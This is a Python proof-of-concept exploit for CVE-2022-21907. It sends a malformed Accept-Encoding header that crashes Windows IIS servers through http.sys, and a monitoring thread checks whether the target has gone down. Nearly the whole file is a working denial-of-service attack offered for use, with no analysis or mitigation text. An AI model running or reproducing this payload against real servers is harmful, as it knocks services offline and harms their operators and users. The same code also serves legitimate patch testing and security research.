CVE-2022-21907_http.sys_crash.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : CVE-2022-21907_http.sys_crash.py
# Author             : Podalirius (@podalirius_)
# Date created       : 13 Jan 2022

import argparse
import datetime
import requests
import time
import threading


def parseArgs():
    parser = argparse.ArgumentParser(description="Description message")
    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')
    return parser.parse_args()


def monitor_thread(target, dtime=5):
    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)
    for k in range(dtime):
        try:
            r = requests.get(target, timeout=1)
        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        else:
            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
            time.sleep(1)


if __name__ == '__main__':
    options = parseArgs()

    if not options.target.startswith('http://') and not options.target.startswith('https://'):
        target = "http://" + options.target
    else:
        target = options.target

    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'

    # Starting monitoring thread
    t = threading.Thread(target=monitor_thread, args=(target,))
    t.start()
    time.sleep(2)

    # Sending payload
    print("   [+] Sending payload ...")
    try:
        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)
    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:
        t.join()
        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))

    # Cleanup
    t.join()